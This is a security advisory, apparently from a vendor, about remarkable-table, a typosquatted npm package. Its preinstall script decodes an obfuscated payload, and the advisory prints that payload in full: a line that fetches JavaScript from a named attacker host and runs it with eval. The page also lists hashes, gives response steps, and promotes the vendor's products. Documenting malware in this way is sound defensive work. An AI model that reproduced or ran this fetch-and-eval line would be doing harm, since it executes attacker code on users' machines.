Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

remarkable-tablenpm

Malicious code in remarkable-table (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-10447
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall remarkable-table

What this malware does

The package's preinstall script runs index.d.js, which reconstructs the identifier 'eval' from a character-code array ([101,118,97,108]) and base64-decodes an embedded payload that resolves to (async()=>eval(await fetch('https://everydaynodechecker-39143n.vercel.app/api/key?mem=root3').then(r=>r.text())))();. On npm install, the package performs an outbound HTTPS request to everydaynodechecker-39143n.vercel.app and passes the response body to eval, executing arbitrary attacker-controlled JavaScript on the installer's machine. Both the sink (eval) and the destination are obfuscated to evade casual review. The destination is unrelated to any legitimate table/markdown functionality, and the package name is a typosquat of the widely used markdown-table.

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Malicious versions

1 flagged
2.4.11

Indicators of compromise (SHA-256)

464cab930bcf948abf49517f78a3ee1abb8b89c8f9c90f199bd3446c902d8e1e
440ccabe384f89b7538fe684b1bb7fc5490d08bc49f83659808230ea46b07574

Detection & response playbook

Typosquat
  1. Find it

    Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for remarkable-table (version 2.4.11). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging remarkable-table across your stack and pipelines.

  2. If you installed it — respond

    remarkable-table is a typosquat — you almost certainly intended a legitimately-named package. Remove remarkable-table, install the correct package, and rotate any secrets exposed during the install since post-install scripts may have already run.

  3. Did it already run?

    If remarkable-table was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

  4. How O3 protects you

    O3 blocks remarkable-table before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. remarkable-table on npm has been identified as a malicious package (version 2.4.11 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-010244GHSA-pw78-w6gv-hfcr

References

Credits

  • Amazon Inspector · finder

Detect & block this

O3 blocks remarkable-table-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.